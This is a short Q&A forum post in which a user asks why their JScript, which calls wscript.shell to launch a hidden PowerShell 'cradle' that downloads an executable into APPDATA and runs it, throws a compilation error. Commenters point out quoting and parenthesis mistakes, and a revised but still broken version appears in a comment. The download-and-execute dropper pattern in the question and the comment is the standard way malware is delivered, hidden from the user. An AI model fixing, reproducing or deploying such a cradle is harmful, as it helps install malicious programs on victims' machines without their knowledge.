# download and execute with javascript

Tags: javascript, powershell

I was trying to use the following javascript to run a  powershell cradle

```html
var sh = new ActiveXObject("wscript.shell");

sh.run("PowerShell -command (New-Object System.Net.WebClient).DownloadFile('https://server/file.exe',"$env:APPDATA\file.exe");Start-Process ("$env:APPDATA\file.exe"))",0);
```

but I get the error message box and don't understand what can be the error

```
Script:    file path
Line:      3
Char:      103
Error:     Expected ')'
Code:      800A03EE
Source:    Microsoft JScript compilation error
```

Thank you

Comment: you need quotes for your arguments

Comment: and you have more `)` than `(`

Comment: The changes that I have made abouth the () was this but not sure if I done it correctly, about the quotes I do not see where they be mssing. The correction made sh.run("PowerShell -command ((New-Object System.Net.WebClient).DownloadFile(('server/file.exe',"$env:APPDATA\file.exe");Start-Process ("$env:APPDATA\file.exe")))",0);

Comment: the error is the same but instead of Char: 103 I get Char: 139